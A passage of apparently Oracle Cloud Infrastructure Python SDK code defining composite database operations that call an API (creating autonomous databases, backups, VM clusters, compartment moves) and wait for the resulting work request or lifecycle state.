A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_external_non_container_database_compartment(change_compartment_details, external_non_container_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def change_external_pluggable_database_compartment_and_wait_for_work_request(self, change_compartment_details, external_pluggable_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_external_pluggable_database_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeCompartmentDetails change_compartment_details: (required)
Request to move the :func:`create_external_pluggable_database_details` resource to a different compartment.
:param str external_pluggable_database_id: (required)
The ExternalPluggableDatabaseId `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_external_pluggable_database_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_external_pluggable_database_compartment(change_compartment_details, external_pluggable_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def change_key_store_compartment_and_wait_for_work_request(self, change_key_store_compartment_details, key_store_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_key_store_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeKeyStoreCompartmentDetails change_key_store_compartment_details: (required)
Request to move key store to a different compartment
:param str key_store_id: (required)
The `OCID`__ of the key store.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_key_store_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_key_store_compartment(change_key_store_compartment_details, key_store_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def change_vm_cluster_compartment_and_wait_for_work_request(self, change_vm_cluster_compartment_details, vm_cluster_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_vm_cluster_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeVmClusterCompartmentDetails change_vm_cluster_compartment_details: (required)
Request to move the Exadata Cloud@Customer VM cluster to a different compartment.
:param str vm_cluster_id: (required)
The VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_vm_cluster_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_vm_cluster_compartment(change_vm_cluster_compartment_details, vm_cluster_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def check_external_database_connector_connection_status_and_wait_for_work_request(self, external_database_connector_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.check_external_database_connector_connection_status` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str external_database_connector_id: (required)
The `OCID`__ of the
external database connector resource (`ExternalDatabaseConnectorId`).
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.check_external_database_connector_connection_status`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.check_external_database_connector_connection_status(external_database_connector_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def complete_external_backup_job_and_wait_for_work_request(self, backup_id, complete_external_backup_job_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.complete_external_backup_job` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str backup_id: (required)
The backup `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.CompleteExternalBackupJobDetails complete_external_backup_job_details: (required)
Updates the status of the backup resource.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.complete_external_backup_job`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.complete_external_backup_job(backup_id, complete_external_backup_job_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def configure_autonomous_database_vault_key_and_wait_for_work_request(self, autonomous_database_id, configure_autonomous_database_vault_key_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.configure_autonomous_database_vault_key` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.ConfigureAutonomousDatabaseVaultKeyDetails configure_autonomous_database_vault_key_details: (required)
Configuration details for the Autonomous Database Vault service `key`__.
__ https://docs.cloud.oracle.com/Content/KeyManagement/Concepts/keyoverview.htm#concepts
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.configure_autonomous_database_vault_key`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.configure_autonomous_database_vault_key(autonomous_database_id, configure_autonomous_database_vault_key_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def convert_to_pdb_and_wait_for_work_request(self, database_id, convert_to_pdb_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.convert_to_pdb` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.ConvertToPdbDetails convert_to_pdb_details: (required)
Request to convert a non-container database to a pluggable database.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.convert_to_pdb`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.convert_to_pdb(database_id, convert_to_pdb_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def convert_to_pdb_and_wait_for_state(self, database_id, convert_to_pdb_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.convert_to_pdb` and waits for the :py:class:`~oci.database.models.Database` acted upon
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.ConvertToPdbDetails convert_to_pdb_details: (required)
Request to convert a non-container database to a pluggable database.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.Database.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.convert_to_pdb`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
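Example (illustrative sketch only; assumes ``composite_client`` is an already-initialized composite operations instance wrapping a configured :py:class:`~oci.database.DatabaseClient`, and that the OCID shown is a placeholder):

.. code-block:: python

    import oci

    details = oci.database.models.ConvertToPdbDetails(action='PRECHECK')
    response = composite_client.convert_to_pdb_and_wait_for_state(
        'ocid1.database.oc1..<unique_id>',
        details,
        wait_for_states=[oci.database.models.Database.LIFECYCLE_STATE_AVAILABLE])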
"""
operation_result = self.client.convert_to_pdb(database_id, convert_to_pdb_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_autonomous_container_database_and_wait_for_work_request(self, create_autonomous_container_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_autonomous_container_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.CreateAutonomousContainerDatabaseDetails create_autonomous_container_database_details: (required)
Request to create an Autonomous Container Database in a specified Autonomous Exadata Infrastructure or in an Autonomous VM Cluster.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_autonomous_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_autonomous_container_database(create_autonomous_container_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_autonomous_container_database_and_wait_for_state(self, create_autonomous_container_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_autonomous_container_database` and waits for the :py:class:`~oci.database.models.AutonomousContainerDatabase` acted upon
to enter the given state(s).
:param oci.database.models.CreateAutonomousContainerDatabaseDetails create_autonomous_container_database_details: (required)
Request to create an Autonomous Container Database in a specified Autonomous Exadata Infrastructure or in an Autonomous VM Cluster.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousContainerDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_autonomous_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_autonomous_container_database(create_autonomous_container_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_container_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_autonomous_database_and_wait_for_work_request(self, create_autonomous_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_autonomous_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.CreateAutonomousDatabaseBase create_autonomous_database_details: (required)
Request to create a new Autonomous Database.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_autonomous_database(create_autonomous_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_autonomous_database_and_wait_for_state(self, create_autonomous_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_autonomous_database` and waits for the :py:class:`~oci.database.models.AutonomousDatabase` acted upon
to enter the given state(s).
:param oci.database.models.CreateAutonomousDatabaseBase create_autonomous_database_details: (required)
Request to create a new Autonomous Database.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
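Example (illustrative sketch only; assumes ``composite_client`` is an already-initialized composite operations instance wrapping a configured :py:class:`~oci.database.DatabaseClient`, and that the compartment OCID and admin password are placeholders):

.. code-block:: python

    import oci

    details = oci.database.models.CreateAutonomousDatabaseDetails(
        compartment_id='ocid1.compartment.oc1..<unique_id>',
        db_name='adbexample',
        cpu_core_count=1,
        data_storage_size_in_tbs=1,
        admin_password='<admin_password>')
    response = composite_client.create_autonomous_database_and_wait_for_state(
        details,
        wait_for_states=[oci.database.models.AutonomousDatabase.LIFECYCLE_STATE_AVAILABLE])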
"""
operation_result = self.client.create_autonomous_database(create_autonomous_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_autonomous_database_backup_and_wait_for_work_request(self, create_autonomous_database_backup_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_autonomous_database_backup` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.CreateAutonomousDatabaseBackupDetails create_autonomous_database_backup_details: (required)
Request to create a new Autonomous Database backup.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_autonomous_database_backup`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_autonomous_database_backup(create_autonomous_database_backup_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_autonomous_database_backup_and_wait_for_state(self, create_autonomous_database_backup_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_autonomous_database_backup` and waits for the :py:class:`~oci.database.models.AutonomousDatabaseBackup` acted upon
to enter the given state(s).
:param oci.database.models.CreateAutonomousDatabaseBackupDetails create_autonomous_database_backup_details: (required)
Request to create a new Autonomous Database backup.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousDatabaseBackup.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_autonomous_database_backup`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_autonomous_database_backup(create_autonomous_database_backup_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_database_backup(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_autonomous_vm_cluster_and_wait_for_work_request(self, create_autonomous_vm_cluster_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_autonomous_vm_cluster` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.CreateAutonomousVmClusterDetails create_autonomous_vm_cluster_details: (required)
Request to create an Autonomous VM cluster.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_autonomous_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_autonomous_vm_cluster(create_autonomous_vm_cluster_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_autonomous_vm_cluster_and_wait_for_state(self, create_autonomous_vm_cluster_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_autonomous_vm_cluster` and waits for the :py:class:`~oci.database.models.AutonomousVmCluster` acted upon
to enter the given state(s).
:param oci.database.models.CreateAutonomousVmClusterDetails create_autonomous_vm_cluster_details: (required)
Request to create an Autonomous VM cluster.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousVmCluster.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_autonomous_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_autonomous_vm_cluster(create_autonomous_vm_cluster_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_vm_cluster(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_backup_and_wait_for_work_request(self, create_backup_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_backup` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.CreateBackupDetails create_backup_details: (required)
Request to create a new database backup.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_backup`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_backup(create_backup_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_backup_and_wait_for_state(self, create_backup_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_backup` and waits for the :py:class:`~oci.database.models.Backup` acted upon
to enter the given state(s).
:param oci.database.models.CreateBackupDetails create_backup_details: (required)
Request to create a new database backup.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.Backup.lifecycle_state`
:param dict operation_kwargs:
